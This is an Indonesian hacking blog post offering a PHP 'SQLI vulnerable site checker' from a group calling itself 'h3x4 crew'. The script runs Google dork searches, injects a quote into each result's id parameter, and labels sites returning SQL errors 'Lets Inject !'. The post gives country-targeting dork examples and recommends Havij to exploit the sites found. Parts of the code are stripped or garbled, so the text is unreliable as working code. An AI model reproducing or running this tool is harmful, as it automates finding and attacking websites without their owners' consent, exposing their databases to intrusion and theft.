scanner

Share this Article now on :

How to edit dork : inurl:[filename].php?id=+site:[countrycode]

example : inurl:news.php?id=+site:id ( scan
file news.php for Indonesia site )


SQLI vulnerable site checker";
echo "

";
echo "Dork:

";
echo "";
echo "

---

";

if($_POST['dork']) {

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(true);
ini_set('memory_limit', '128M');

$google = "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=REPLACE_DORK&num=100&hl=en&as_qdr=all&start=REPLACE_START&sa=N";

$i = 0;
$a = 0;
$b = 0;

while($b <= 10000) { $a = 0; flush(); ob_flush(); echo "@ Site Checked : [ $b ]
";
echo "@ Dork used : [ ".$_POST['dork']." ]
";
echo "@ Scanning in Process ! .
";
flush(); ob_flush();

if(preg_match("/did not match any documents/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $val)) {
echo "See something but not found??
";
flush(); ob_flush();
break;
}

preg_match_all("/

/", Connect_Host(str_replace(array("REPLACE_DORK", "REPLACE_START"), array("".$_POST['dork']."", "$b"), $google)), $sites);
echo "Result of injection...
";
flush(); ob_flush();
while(1) {

if(preg_match("/You have an error in your SQL|Division by zero in|supplied argument is not a valid MySQL result resource in|Call to a member function|Microsoft JET Database|ODBC Microsoft Access Driver|Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark|Microsoft OLE DB Provider for Oracle|Incorrect syntax near|SQL query failed/", Connect_Host(str_replace("=", "='", $sites[2][$a])))) {
echo "".str_replace("=", "='", $sites[2][$a])." <== Lets Inject !
";
} else {
echo "".str_replace("=", "='", $sites[2][$a])." <== Just Leave it!
";
flush(); ob_flush();
}
if($a > count($sites[2])-2) {
echo "Lets..scan other page..
";
break;
}
$a = $a+1;
}
$b = $b+100;
}
}

function Connect_Host($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function Clean($text) {
return htmlspecialchars($text, ENT_QUOTES);
}

?>

SQLI
scanner

[ h3x4 crew ]

-Fakyu Tuyu , Cyg Selalu , Shah MIRC , Damien faisal , hexon , Fiqri Shah , Amy Barin , Pidot , Ery Ramlee , Pak Arab , Black Hand ( syam92x ) , hambamalam , wanwawan , masokis , akeem , iawaho , pii VVip , Dboyz , d3r1s

-
Special Thanks to Syam92x ( Black Hand )



Notes : When u get the site is vulnerable sqli , u are adviseable to use Havij , so ur hacking process more easier!

Download tools | Country ID | h3x4 crew | Dork List

Anda sedang membaca artikel tentang scanner dan anda bisa menemukan artikel scanner ini dengan url https://ccheunk.blogspot.com/2012/08/scanner.html,anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel scanner ini sangat bermanfaat bagi teman-teman anda,namun jangan lupa untuk meletakkan link scanner sebagai sumbernya.Dan baca juga Privacy Policy DeeJayHan-Blog dengan url http://deejayhan.blogspot.com/2011/11/shell-collection.html.

Rating Artikel : 5 Jumlah Voting : 99480 Orang